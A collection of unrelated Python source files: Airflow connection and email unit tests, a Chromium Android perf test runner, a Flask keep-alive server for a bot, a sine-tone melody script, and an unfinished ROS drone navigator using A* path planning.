self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
class TestWebHDFSHook(unittest.TestCase):
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None # type: Optional[hdfs_hook.HDFSHook]
snakebite = None # type: None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class TestHDFSHook(unittest.TestCase):
def setUp(self):
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class TestEmail(unittest.TestCase):
def setUp(self):
conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_once_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
with conf_vars({('email', 'email_backend'): 'tests.core.send_email_test'}):
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_once_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class TestEmailSmtp(unittest.TestCase):
def setUp(self):
conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = 'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual('attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_once_with(
conf.get('smtp', 'SMTP_USER'),
conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_once_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({('smtp', 'smtp_ssl'): 'True'}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({
('smtp', 'smtp_user'): None,
('smtp', 'smtp_password'): None,
}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
test_runner.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs perf tests.
Our buildbot infrastructure requires each slave to run steps serially.
This is sub-optimal for android, where these steps can run independently on
multiple connected devices.
The buildbots will run this script multiple times per cycle:
- First: all steps listed in --steps will be executed in parallel using all
connected devices. Step results will be pickled to disk. Each step has a unique
name. The result code will be ignored if the step name is listed in
--flaky-steps.
The buildbot will treat this step as a regular step, and will not process any
graph data.
- Then, with --print-step STEP_NAME: at this stage, we'll simply print the file
with the step results previously saved. The buildbot will then process the graph
data accordingly.
The JSON steps file contains a dictionary in the format:
{ "version": int,
"steps": {
"foo": {
"device_affinity": int,
"cmd": "script_to_execute foo"
},
"bar": {
"device_affinity": int,
"cmd": "script_to_execute bar"
}
}
}
The JSON flaky steps file contains a list of step names whose results should
be ignored:
[
"step_name_foo",
"step_name_bar"
]
Note that script_to_execute necessarily has to take at least the following
option:
--device: the serial number to be passed to all adb commands.
"""
import collections
import datetime
import json
import logging
import os
import pickle
import sys
import threading
import time
from pylib import cmd_helper
from pylib import constants
from pylib import forwarder
from pylib.base import base_test_result
from pylib.base import base_test_runner
def OutputJsonList(json_input, json_output):
with file(json_input, 'r') as i:
all_steps = json.load(i)
step_names = all_steps['steps'].keys()
with file(json_output, 'w') as o:
o.write(json.dumps(step_names))
return 0
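# Example: with a steps file shaped like the module docstring above, e.g.
#
#   {"version": 1,
#    "steps": {"foo": {"device_affinity": 0, "cmd": "script_to_execute foo"},
#              "bar": {"device_affinity": 1, "cmd": "script_to_execute bar"}}}
#
# a call such as OutputJsonList('steps.json', 'out.json') (file names here are
# only illustrative) writes the step names as a JSON list, e.g. ["foo", "bar"]
# (key order is not guaranteed).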
def PrintTestOutput(test_name):
"""Helper method to print the output of previously executed test_name.
Args:
test_name: name of the test that has been previously executed.
Returns:
exit code generated by the test step.
"""
file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name)
if not os.path.exists(file_name):
logging.error('File not found %s', file_name)
return 1
with file(file_name, 'r') as f:
persisted_result = pickle.loads(f.read())
logging.info('*' * 80)
logging.info('Output from:')
logging.info(persisted_result['cmd'])
logging.info('*' * 80)
print persisted_result['output']
return persisted_result['exit_code']
def PrintSummary(test_names):
logging.info('*' * 80)
logging.info('Sharding summary')
device_total_time = collections.defaultdict(int)
for test_name in test_names:
file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name)
if not os.path.exists(file_name):
logging.info('%s : No status file found', test_name)
continue
with file(file_name, 'r') as f:
result = pickle.loads(f.read())
logging.info('%s : exit_code=%d in %d secs at %s',
result['name'], result['exit_code'], result['total_time'],
result['device'])
device_total_time[result['device']] += result['total_time']
for device, device_time in device_total_time.iteritems():
logging.info('Total for device %s : %d secs', device, device_time)
logging.info('Total steps time: %d secs', sum(device_total_time.values()))
class _HeartBeatLogger(object):
# How often to print the heartbeat on flush().
_PRINT_INTERVAL = 30.0
def __init__(self):
"""A file-like class for keeping the buildbot alive."""
self._len = 0
self._tick = time.time()
self._stopped = threading.Event()
self._timer = threading.Thread(target=self._runner)
self._timer.start()
def _runner(self):
while not self._stopped.is_set():
self.flush()
self._stopped.wait(_HeartBeatLogger._PRINT_INTERVAL)
def write(self, data):
self._len += len(data)
def flush(self):
now = time.time()
if now - self._tick >= _HeartBeatLogger._PRINT_INTERVAL:
self._tick = now
print '--single-step output length %d' % self._len
sys.stdout.flush()
def stop(self):
self._stopped.set()
class TestRunner(base_test_runner.BaseTestRunner):
def __init__(self, test_options, device, shard_index, max_shard, tests,
flaky_tests):
"""A TestRunner instance runs a perf test on a single device.
Args:
test_options: A PerfOptions object.
device: Device to run the tests.
shard_index: the index of this device.
      max_shard: the total number of shards.
tests: a dict mapping test_name to command.
flaky_tests: a list of flaky test_name.
"""
super(TestRunner, self).__init__(device, None, 'Release')
self._options = test_options
self._shard_index = shard_index
self._max_shard = max_shard
self._tests = tests
self._flaky_tests = flaky_tests
@staticmethod
def _IsBetter(result):
if result['actual_exit_code'] == 0:
return True
pickled = os.path.join(constants.PERF_OUTPUT_DIR,
result['name'])
if not os.path.exists(pickled):
return True
with file(pickled, 'r') as f:
previous = pickle.loads(f.read())
return result['actual_exit_code'] < previous['actual_exit_code']
@staticmethod
def _SaveResult(result):
if TestRunner._IsBetter(result):
with file(os.path.join(constants.PERF_OUTPUT_DIR,
result['name']), 'w') as f:
f.write(pickle.dumps(result))
def _CheckDeviceAffinity(self, test_name):
"""Returns True if test_name has affinity for this shard."""
affinity = (self._tests['steps'][test_name]['device_affinity'] %
self._max_shard)
if self._shard_index == affinity:
return True
logging.info('Skipping %s on %s (affinity is %s, device is %s)',
test_name, self.device_serial, affinity, self._shard_index)
return False
def _LaunchPerfTest(self, test_name):
"""Runs a perf test.
Args:
test_name: the name of the test to be executed.
Returns:
A tuple containing (Output, base_test_result.ResultType)
"""
if not self._CheckDeviceAffinity(test_name):
return '', base_test_result.ResultType.PASS
try:
logging.warning('Unmapping device ports')
forwarder.Forwarder.UnmapAllDevicePorts(self.device)
self.device.old_interface.RestartAdbdOnDevice()
except Exception as e:
logging.error('Exception when tearing down device %s', e)
cmd = ('%s --device %s' %
(self._tests['steps'][test_name]['cmd'],
self.device_serial))
logging.info('%s : %s', test_name, cmd)
start_time = datetime.datetime.now()
timeout = 5400
if self._options.no_timeout:
timeout = None
full_cmd = cmd
if self._options.dry_run:
full_cmd = 'echo %s' % cmd
logfile = sys.stdout
if self._options.single_step:
# Just print a heart-beat so that the outer buildbot scripts won't timeout
# without response.
logfile = _HeartBeatLogger()
cwd = os.path.abspath(constants.DIR_SOURCE_ROOT)
if full_cmd.startswith('src/'):
cwd = os.path.abspath(os.path.join(constants.DIR_SOURCE_ROOT, os.pardir))
try:
exit_code, output = cmd_helper.GetCmdStatusAndOutputWithTimeout(
full_cmd, timeout, cwd=cwd, shell=True, logfile=logfile)
finally:
if self._options.single_step:
logfile.stop()
end_time = datetime.datetime.now()
if exit_code is None:
exit_code = -1
logging.info('%s : exit_code=%d in %d secs at %s',
test_name, exit_code, (end_time - start_time).seconds,
self.device_serial)
result_type = base_test_result.ResultType.FAIL
if exit_code == 0:
result_type = base_test_result.ResultType.PASS
actual_exit_code = exit_code
if test_name in self._flaky_tests:
# The exit_code is used at the second stage when printing the
# test output. If the test is flaky, force to "0" to get that step green
# whilst still gathering data to the perf dashboards.
# The result_type is used by the test_dispatcher to retry the test.
exit_code = 0
persisted_result = {
'name': test_name,
'output': output,
'exit_code': exit_code,
'actual_exit_code': actual_exit_code,
'result_type': result_type,
'total_time': (end_time - start_time).seconds,
'device': self.device_serial,
'cmd': cmd,
}
self._SaveResult(persisted_result)
return (output, result_type)
def RunTest(self, test_name):
"""Run a perf test on the device.
Args:
test_name: String to use for logging the test result.
Returns:
A tuple of (TestRunResults, retry).
"""
_, result_type = self._LaunchPerfTest(test_name)
results = base_test_result.TestRunResults()
results.AddResult(base_test_result.BaseTestResult(test_name, result_type))
retry = None
if not results.DidRunPass():
retry = test_name
return results, retry
|
bot_status.py
|
from flask import Flask
from threading import Thread
from waitress import serve
app = Flask('')
@app.route('/')
def home():
return "Bot is online!"
def run():
serve(app, host="0.0.0.0", port=8080) # production server using waitress
# app.run(host='0.0.0.0',port=8080) #development server
def keep_alive():
t = Thread(target=run)
t.start()
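# Typical usage (illustrative only; the calling script is not part of this file):
#
#   from bot_status import keep_alive
#   keep_alive()        # start the keep-alive web server in a background thread
#   bot.run(TOKEN)      # hypothetical bot start-up call that blocks afterwards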
|
melody.py
|
import random
import pyaudio
from comp_osc import SineOsc
import multiprocessing as mp
import time
sine_osc = SineOsc()
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paFloat32,
channels=1,
rate=44100,
output=1,
)
def func1():
print ('func1')
sweepRange = 100
start = 600
freq = random.choice([start, start, start, start, start, start, start * 9/8,])
length = .025
for i in range(sweepRange):
sine_osc.play_frequencies(stream, length, .25, 200, 200,
freq,
freq,
freq * 2
)
freq += 3
if sweepRange - i < 6:
length += .1
for i in range(2):
sine_osc.play_frequencies(stream, .3, .5, 200, 200,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 2000, 200,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 200, 2000,
freq,
freq,
freq * 2,
)
freq = freq * 24/25
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 500, 2000,
freq,
freq,
freq * 2,
)
freq = freq * 25/24
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 25/24
sine_osc.play_frequencies(stream, .3, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 7/6
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 6/7
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 9/10
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 24/25
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/11
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 7/6
sine_osc.play_frequencies(stream, .3, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 7/6
sine_osc.play_frequencies(stream, .35, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
sine_osc.play_frequencies(stream, .3, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
sine_osc.play_frequencies(stream, .4, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
sine_osc.play_frequencies(stream, .4, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
sine_osc.play_frequencies(stream, .45, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
sine_osc.play_frequencies(stream, .8, .8, 2000, 3000,
freq,
freq,
freq * 2,
)
sine_osc.play_frequencies(stream, .9, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
# def func2():
# print ('func2')
# freq = 300
# freq = random.choice([freq])
# for i in range(10):
# sine_osc.play_frequencies(stream, 3, .75, 1000, 30000,
# freq * 2/3,
# freq / 3
# )
#
# sine_osc.play_frequencies(stream, 1, .5, 2000, 30000,
# freq * 3/2,
# freq * 4/3
# )
# sine_osc.play_frequencies(stream, 2, .5, 5000, 20000,
# freq * 7/4,
# freq * 5/4
# )
#
# sine_osc.play_frequencies(stream, 1, .75, 10000, 10000,
# freq * 2/3,
# freq / 3
# )
# sine_osc.play_frequencies(stream, 2, .5, 20000, 10000,
# freq * 5/4
# )
#
#
# def func3():
# print ('func3')
# for i in range(11):
# sine_osc.play_frequencies(stream, 12, .6, 1000, 50000,
# 50,
# 48,
# )
if __name__=='__main__':
# mp.set_start_method('spawn')
# p1 = mp.Process(target=func1)
# p1.start()
time.sleep(10)
for i in range(4):
print (i)
time.sleep(20)
func1()
# I will pass you multiple series of notes and you will prepare to play them.
# When they are all ready, you will combine them and produce a single audio file.
# Phrases do not need to start at the same time.
# Phrases do not need to have any shared metrics.
# Rhythmic interaction will be described using mathematical relationships.
# I can put a flag in one phrase that signals when a second phrase will start
# I can wait to start a phrase.
# I can put space in a phrase.
|
Navigator.py
|
#encoding=utf-8
'''
project overview:
Subscribe:
1.slam pose(global/local pose) *
2.octomap_server/global map
3.local pointcloud/local octomap
4.target input(semantic target/visual pose target/gps target)
Publish:
1.Mavros(amo) Command
2.Navigator status
Algorithms:
1.D*
2.state transfer
3.position->position PID controller
4.global/semantic/visual target to local pose
'''
import threading
import time
# for ros
import rospy
from geometry_msgs.msg import PoseStamped, Twist
from std_msgs.msg import Float32, String
from sensor_msgs.msg import Imu, NavSatFix, PointCloud, PointCloud2
import sensor_msgs.point_cloud2 as pc2
from visualization_msgs.msg import Marker,MarkerArray
# for mavros
from mavros_msgs.msg import GlobalPositionTarget, State, PositionTarget#, Command
from mavros_msgs.srv import CommandBool, SetMode
# for octomap
from octomap_msgs.msg import Octomap, OctomapWithPose, octomap_msgs
# other useful utilities
#from pyquaternion import Quaternion
import pyquaternion
import astar.astar
import astar.driver
import time
import math
from enum import Enum
import thread
#from queue import Queue
#from Pos2PosController import Pos2PosController as Controller # TODO:re-implement this.
from SimController import Controller as Controller
import DiscreteGridUtils
import numpy as np
# define system status
class status(Enum):
INITIALIZED = 1
LOOKING_FOR_PATH = 2
LOOKING_FOR_PATH_SUCCEED = 3
LOOKING_FOR_PATH_FAILED = 4
GOING_TO_TARGET = 5
GOING_TO_VISION_TARGET = 6
def dist(pos1,pos2):
if not pos1 or not pos2:
return False, 0
else:
return True, reduce(lambda x,y:x+y,map(lambda i:(pos1[i]-pos2[i])**2,[0,1,2]))
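# Note: dist() returns a tuple (ok, squared_distance); the second element is the
# *squared* Euclidean distance, so callers must compare it against a squared
# threshold. For example:
#   dist((0, 0, 0), (1, 2, 2))  ->  (True, 9)    # 1**2 + 2**2 + 2**2
#   dist(None, (1, 2, 2))       ->  (False, 0)   # missing pose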
class Navigator:
def __init__(self,config_file_path = None):
if config_file_path:
pass
rospy.init_node("gi_navigator_node")
self.dg = DiscreteGridUtils.DiscreteGridUtils(grid_size=0.2)#0.2)
self.rate = rospy.Rate(50)
self.driver = astar.driver.Driver()
self.controller = Controller()
self.mavros_state = "OFFBOARD"
self.set_status(status.INITIALIZED)
self.cur_command_id = 0
self.prev_command_id = 0
self.cur_target_position=None
self.task_id = -1
self.obstacle_set_mutex = threading.Lock() # mutex.acquire(timeout);mutex.release()
self.nav_command_mutex = threading.Lock() # for nav command in dstar and ros high level command.
self.local_pose = None
t1 = threading.Thread(target=self.ros_thread)
t1.start()
self.navigator_status_pub = rospy.Publisher('/gi/navigator_status', String, queue_size=10)
self.path_plan_pub = rospy.Publisher('/gi/navi_path_plan',MarkerArray,queue_size=10)
#t2 = thread.start_new_thread(self.Dstar_thread, ())
#self.keep_navigating()
'''
Navigating thread
'''
def keep_navigating(self):
while self.mavros_state == "OFFBOARD" and not(rospy.is_shutdown()):
# print ('Inside outer loop!')
#print ("Navigator state: ", self.STATUS.data, "Mavros state: ", self.mavros_state)
relative_pos = (0, 0, 0)
end_pos = self.get_latest_target()
current_pos = self.get_current_pose() # TODO:fix this.
if current_pos is None:
print ('current pose not valid!')
continue
while current_pos != end_pos and not self.navi_task_terminated() and not(rospy.is_shutdown()): # Till task is finished:
# print ('Inside inner loop!')
current_pos = self.get_current_pose()
self.algo = astar.astar.A_star(end_pos)
print ('Move 1 step')
                obstacle_map = self.driver.get_obstacles_around() # TODO: add obstacle memory (remember obstacles already seen).
print ('From ', current_pos)
t1 = time.time()
self.driver.algo = astar.astar.A_star(end_pos)
path = self.algo.find_path(current_pos, self.driver.get_obstacles_around())
t2 = time.time()
print('A* time cost:', (t2 - t1))
if not path:
#TODO set status
print ('No path found!')
self.do_hover() # TODO
time.sleep(0.05) # TODO
else: # Path found. keep state machine and do task step by step.
#publish path plan.
m_arr = MarkerArray()
marr_index = 0
for next_move in path:
point = self.dg.discrete_to_continuous_target((next_move[0],next_move[1],next_move[2]))
mk = Marker()
mk.header.frame_id="map"
mk.action=mk.ADD
mk.id=marr_index
marr_index+=1
mk.color.g=1.0
mk.color.a=1.0
mk.type=mk.CUBE
mk.scale.x = 0.3
mk.scale.y = 0.3
mk.scale.z = 0.3
mk.pose.position.x = point[0]
mk.pose.position.y = point[1]
mk.pose.position.z = point[2]
m_arr.markers.append(mk)
self.path_plan_pub.publish(m_arr)
# eliminate extra points in the path
path = self.remove_collinear_points(path)
for next_move in path:
self.path_plan_pub.publish(m_arr)
if self.navi_task_terminated():
break
print ('current_pos:', current_pos)
next_pos = next_move
relative_pos = (next_pos[0] - current_pos[0], next_pos[1] - current_pos[1],
next_pos[2] - current_pos[2])
print ('next_move : ', next_move)
print ("relative_move : ", relative_pos)
if not self.driver.algo.is_valid(next_pos, self.driver.get_obstacles_around()):
print ('Path not valid!')
break
self.current_pos = next_pos
#axis transform
relative_pos_new = (-relative_pos[0], -relative_pos[1], relative_pos[2])
#self.controller.mav_move(*relative_pos_new,abs_mode=False) # TODO:fix this.
                        print ('mav_move() input: absolute target pos=', next_pos)
self.controller.mav_move(*self.dg.discrete_to_continuous_target((next_pos[0],next_pos[1],next_pos[2])), abs_mode=True) # TODO:fix this.
current_pos = self.get_current_pose()
time.sleep(2)
predict_move = (self.current_pos[0] + relative_pos[0], self.current_pos[1] + relative_pos[1],
self.current_pos[2] + relative_pos[2])
print ("predict_move : ", predict_move)
'''
if not self.algo.is_valid(predict_move, self.driver.get_obstacles_around()):
print ('cant go')
break'''
if not self.algo.path_is_valid(path,self.driver.get_obstacles_around()):
print ('Path conflict detected!')
break
time.sleep(0.05) # wait for new nav task.
'''
if self.found_path:
print("Found path!")
target_position = self.cur_target_position
result = False
while result is False:
result = self.mav_move(target_position[0], target_position[1], target_position[2])
print("Reached Position: ", target_position[0], target_position[1], target_position[2])
print("Finished Current Path")
time.sleep(0.2)
'''
print("Mavros not in OFFBOARD mode, Disconnected!")
'''
move quad in body frame
'''
def distance(self, p1, p2):
x_distance = (p2[0] - p1[0])**2
y_distance = (p2[1] - p1[1])**2
z_distance = (p2[2] - p1[2])**2
return np.sqrt(x_distance + y_distance + z_distance)
def remove_collinear_points(self, original_path):
new_path = []
print ("original_path length: ", len(original_path))
length = len(original_path) - 2
new_path.append(original_path[0])
# new_path.append(original_path[-1])
print(original_path)
for i in range(length):
distance13 = self.distance(original_path[i+2], original_path[i])
distance12 = self.distance(original_path[i+1], original_path[i])
distance23 = self.distance(original_path[i+2], original_path[i+1])
print("distance13 - distance12 - distance23 :", distance13 - distance12 - distance23 )
if abs(distance13 - distance12 - distance23) < 0.001:
# print ("points collinear")
continue
else:
print(original_path[i+1])
print("not found collinear point")
new_path.append(original_path[i+1])
print("new path length: ", len(new_path))
print(new_path)
return new_path
def terminate_navigating(self):
#TODO
pass
def resume_navigating(self):
#TODO
pass
    def set_target_position(self, target_position):
self.found_path = True
self.cur_target_position = target_position
#print("Set Current Position to: ", target_position[0], target_position[1], target_position[2])
def get_latest_target(self):
return self.cur_target_position
def set_vision_target(self):
self.set_status(status.GOING_TO_VISION_TARGET)
self.set_target_position(xxxxx) #TODO
pass
    def navi_task_terminated(self):
        ok, sq_dist = dist(self.local_pose, self.cur_target_position)
        # dist() returns a squared distance, so compare against a squared threshold.
        if ok and sq_dist < 0.25:  # TODO: or stop flag is set.
            return True
        else:
            return False
'''
Dstar Thread
def Dstar_thread(self):
while not rospy.is_shutdown():
while status!= xxx:# TODO
next_move = xxx
return next_move'''
'''##For test:
target = [0.5, 0.5, 0.5]
self.set_target_postion(target)
pass'''
'''
ROS thread
responsible for subscribers and publishers
'''
def ros_thread(self):
print('ros_thread spawn!!!!')
self.octomap_msg = None
# subscribers
self.slam_sub = rospy.Subscriber("/gi/slam_output/pose", PoseStamped, self.slam_pose_callback)
self.vision_target_sub = rospy.Subscriber("/gi/visual_target/pose", PoseStamped, self.vision_target_callback)
self.point_cloud_sub = rospy.Subscriber("/camera/left/point_cloud", PointCloud, self.point_cloud_callback)
self.octomap_cells_vis = rospy.Subscriber("/octomap_point_cloud_centers", PointCloud2, self.octomap_update_callback)
self.local_pose_sub = rospy.Subscriber("/mavros/local_position/pose", PoseStamped, self.local_pose_callback)
self.mavros_sub = rospy.Subscriber("/mavros/state", State, self.mavros_state_callback)
# publishers
#self.mavros_control_pub = rospy.Publisher('mavros/Command', Command, queue_size=10)
self.set_status(status.INITIALIZED)
rospy.spin()
'''
ROS callbacks
'''
def slam_pose_callback(self, msg):
self.slam_pose = msg
def vision_target_callback(self, msg):
self.vision_target = msg
#print("Received New Vision Target!")
def mavros_state_callback(self, msg):
self.mavros_state = msg.mode
#print(msg.mode, type(msg.mode))
self.navigator_status_pub.publish(self.STATUS)
def point_cloud_callback(self, msg):
self.current_point_cloud = msg
def octomap_update_callback(self, msg): # as pointcloud2.
obs_set = set()
for p in pc2.read_points(msg, field_names=("x", "y", "z"), skip_nans=True):
#print " x : %f y: %f z: %f" % (p[0], p[1], p[2])
point = self.dg.continuous_to_discrete((p[0],p[1],p[2]))
#print ('point:',point)
obs_set.add(point)
